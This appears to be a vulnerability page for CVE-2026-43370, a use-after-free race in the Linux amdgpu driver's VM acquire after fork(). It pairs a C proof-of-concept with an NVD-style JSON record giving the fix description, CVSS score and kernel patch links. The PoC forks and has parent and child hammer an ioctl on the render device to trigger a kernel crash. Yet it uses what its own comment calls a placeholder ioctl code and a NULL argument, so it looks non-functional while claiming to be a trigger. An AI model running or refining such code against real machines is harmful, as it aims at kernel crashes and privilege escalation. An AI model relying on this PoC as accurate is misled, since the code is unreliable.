CVE-2026-43370

/* * PoC for CVE-2026-43370 * Trigger race condition in amdgpu VM acquire * Compile: gcc -o poc cve-2026-43370.c */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <sys/ioctl.h> #include <sys/wait.h> #define DEVICE_PATH "/dev/dri/renderD128" // Placeholder for the specific ioctl code related to VM operations #define DRM_IOCTL_AMDGPU_VM 0x40446400 void trigger_race(int fd) { // Loop to increase the chance of hitting the race window for (int i = 0; i < 10000; i++) { // This ioctl call attempts to acquire/release VM context // The race occurs when parent and child do this concurrently ioctl(fd, DRM_IOCTL_AMDGPU_VM, NULL); } } int main() { int fd = open(DEVICE_PATH, O_RDWR); if (fd < 0) { perror("Failed to open device"); return 1; } printf("Starting PoC for CVE-2026-43370...\n"); pid_t pid = fork(); if (pid < 0) { perror("Fork failed"); close(fd); return 1; } if (pid == 0) { // Child process trigger_race(fd); exit(0); } else { // Parent process trigger_race(fd); wait(NULL); } close(fd); printf("PoC execution finished. Check kernel logs for crashes.\n"); return 0; }

{"cve": {"id": "CVE-2026-43370", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T15:16:48.067", "lastModified": "2026-05-11T08:16:11.690", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: Fix use-after-free race in VM acquire\n\nReplace non-atomic vm->process_info assignment with cmpxchg()\nto prevent race when parent/child processes sharing a drm_file\nboth try to acquire the same VM after fork().\n\n(cherry picked from commit c7c573275ec20db05be769288a3e3bb2250ec618)"}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "references": [{"url": "https://git.kernel.org/stable/c/2c1030f2e84885cc58bffef6af67d5b9d2e7098f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/46d309996bd9251792d7dafdbaf615cf202b4447", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/7885eb335d8f9e9942925d57e300a85e3f82ded4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/904025fa8bba1d028adade33346372b4ac1a9249", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/94b7782d0c8024f5b88454241c8d4777076c3786", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/ae87aea330c24f462fc7058ed543ba8bc6798447", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/c658c1c85ec235b7ecfbf8dbfee385b1332088f4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/e61e355cbe49e585097eee28c15b862bfb1c0668", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}